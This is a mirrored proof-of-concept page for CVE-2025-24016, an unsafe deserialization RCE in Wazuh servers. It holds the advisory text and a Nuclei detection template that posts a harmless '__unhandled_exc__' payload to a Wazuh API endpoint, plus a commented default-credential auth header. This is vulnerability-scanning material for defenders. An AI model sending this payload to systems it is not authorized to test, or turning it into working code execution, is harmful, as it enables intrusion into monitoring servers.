Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2025-24016 PoC — Remote code execution in Wazuh server

Source
https://github.com/huseyinstif/CVE-2025-24016-Nuclei-Template
Associated Vulnerability
Title:Remote code execution in Wazuh server (CVE-2025-24016)
Description:Wazuh is a free and open source platform used for threat prevention, detection, and response. Starting in version 4.4.0 and prior to version 4.9.1, an unsafe deserialization vulnerability allows for remote code execution on Wazuh servers. DistributedAPI parameters are a serialized as JSON and deserialized using `as_wazuh_object` (in `framework/wazuh/core/cluster/common.py`). If an attacker manages to inject an unsanitized dictionary in DAPI request/response, they can forge an unhandled exception (`__unhandled_exc__`) to evaluate arbitrary python code. The vulnerability can be triggered by anybody with API access (compromised dashboard or Wazuh servers in the cluster) or, in certain configurations, even by a compromised agent. Version 4.9.1 contains a fix.
Readme
# CVE-2025-24016 Wazuh Unsafe Deserialization RCE Detection

This repository contains a Nuclei template to detect the unsafe deserialization vulnerability in Wazuh servers, identified as **CVE-2025-24016**.

## Template Details

```yaml
id: wazuh-unsafe-deserialization
info:
  name: "Wazuh Unsafe Deserialization RCE Detection"
  author: "Hüseyin TINTAŞ"
  severity: critical
  description: |
    This template detects an unsafe deserialization vulnerability in Wazuh servers.
    The DistributedAPI deserializes JSON data using as_wazuh_object. If an attacker injects
    a malicious object (via __unhandled_exc__), arbitrary Python code execution can be achieved.
    Instead of triggering a shutdown (e.g. via exit), this template uses a non-existent class 
    ("NotARealClass") to generate a NameError. A NameError in the response indicates that the 
    payload reached the vulnerable deserialization function.
  tags: wazuh, deserialization, rce, unsafe, cve, cve-2025-24016
  reference:
    - https://documentation.wazuh.com/
requests:
  - method: POST
    path:
      - "{{BaseURL}}/security/user/authenticate/run_as"
    headers:
      Content-Type: application/json
      # If needed, uncomment the following line for authentication (Base64 encoded "wazuh-wui:MyS3cr37P450r.*-")
      # Authorization: "Basic d2F6dXcta3dpTUltUzNjcjM3UDA1MHItOg=="
    body: '{"__unhandled_exc__":{"__class__": "NotARealClass", "__args__": []}}'
    matchers:
      - type: status
        status:
          - 500
      - type: word
        part: body
        words:
          - "NameError"
```

## Usage

```bash
nuclei -t CVE-2025-24016.yaml -u http://example.com
```

## Contact

For any inquiries or further information, you can reach out to me through:

- [LinkedIn](https://www.linkedin.com/in/huseyintintas/)
- [Twitter](https://twitter.com/1337stif)
File Snapshot

 [4.0K]  /data/pocs/c4d655b54017657fc1205124fb7ca047d8a29c91
├── [1.3K]  CVE-2025-24016.yaml
└── [1.8K]  README.md

0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →